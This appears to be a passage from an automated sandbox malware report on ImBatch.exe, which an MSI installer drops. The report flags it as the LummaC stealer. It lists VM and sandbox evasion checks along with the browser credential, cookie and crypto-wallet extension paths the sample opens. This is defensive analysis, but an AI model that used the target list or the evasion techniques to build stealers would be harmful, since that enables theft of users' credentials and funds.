Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Special instruction interceptor: First address: 00000000020F641A instructions caused by: Self-modifying code

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ImBatch.exe, 00000003.00000002.418753476.000000000053D000.00000020.00000001.01000000.00000003.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Windows\System32\msiexec.exe TID: 6688

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Thread sleep count: Count: 1203 delay: -20

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3174.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI31B3.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3133.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3F22.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3154.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Window / User API: threadDelayed 1203

Jump to behavior

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04090409			Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04090409			Jump to behavior

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

API coverage: 4.6 %

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Code function: 3_2_1080B08A GetSystemInfo,

3_2_1080B08A

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_1080A3CC FindFirstFileW,FindClose,	3_2_1080A3CC
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_10814A84 FindFirstFileW,FindClose,	3_2_10814A84
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_10809E64 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,	3_2_10809E64

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

API call chain: ExitProcess graph end node

graph_3-23579

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: ImBatch.exe, 00000003.00000002.418753476.000000000053D000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: VMWare GSX
Source: ImBatch.exe, 00000003.00000002.439109500.00000000119B8000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.429735323.0000000002234000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ImBatch.exe, 00000003.00000002.418753476.000000000053D000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: VMWare ESX
Source: ImBatch.exe, 00000003.00000002.418753476.000000000053D000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: VMWareU
Source: ImBatch.exe, 00000003.00000002.418753476.000000000053D000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: vboxservice.exe
Source: ImBatch.exe, 00000003.00000002.418753476.000000000053D000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: VMWare Express
Source: ImBatch.exe, 00000003.00000002.418753476.000000000053D000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: VMWare Workstation

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Code function: 3_2_1080D3FE IsDebuggerPresent,

3_2_1080D3FE

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Code function: 3_2_6BC8F1B2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_6BC8F1B2

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	3_2_1080A4B4
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: GetLocaleInfoW,	3_2_1080D28A
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_108099FC

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Code function: 3_2_10817310 GetLocalTime,

3_2_10817310

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Code function: 3_2_1080B0A0 GetVersion,

3_2_1080B0A0

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: Process Memory Space: ImBatch.exe PID: 1792, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: ImBatch.exe, 00000003.00000003.352511177.0000000011A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\walletsf
Source: ImBatch.exe, 00000003.00000003.352511177.0000000011A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: ImBatch.exe, 00000003.00000002.439109500.0000000011A05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet1\x
Source: ImBatch.exe, 00000003.00000002.439109500.0000000011A05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet1\x
Source: ImBatch.exe, 00000003.00000002.439109500.0000000011A05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum
Source: ImBatch.exe, 00000003.00000003.341101707.0000000011A46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "keystore"

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.log	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
